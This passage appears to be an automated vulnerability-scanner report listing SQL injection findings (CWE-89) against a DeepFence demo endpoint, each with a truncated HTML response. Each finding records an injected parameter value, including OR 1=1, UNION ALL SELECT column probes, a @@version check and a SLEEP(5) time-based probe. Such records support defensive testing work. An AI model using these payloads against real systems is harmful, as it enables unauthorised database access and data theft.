href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #503\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 1=0#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #504\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io 1' ORDER BY 2--+\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #505\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Valuedemouser@\ndeepfence.ioORDER BY 26#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #506\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io' OR 1 -- -\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #507\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12-\n-\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #508\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io and (select substring(@@version,1,1))='M'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #509\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #510Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #511\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #512\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io'='\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #513\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ' AnD SLEEP(5) ANd '1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #514\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioor 1=1--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #515\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io' or \"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #516\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found 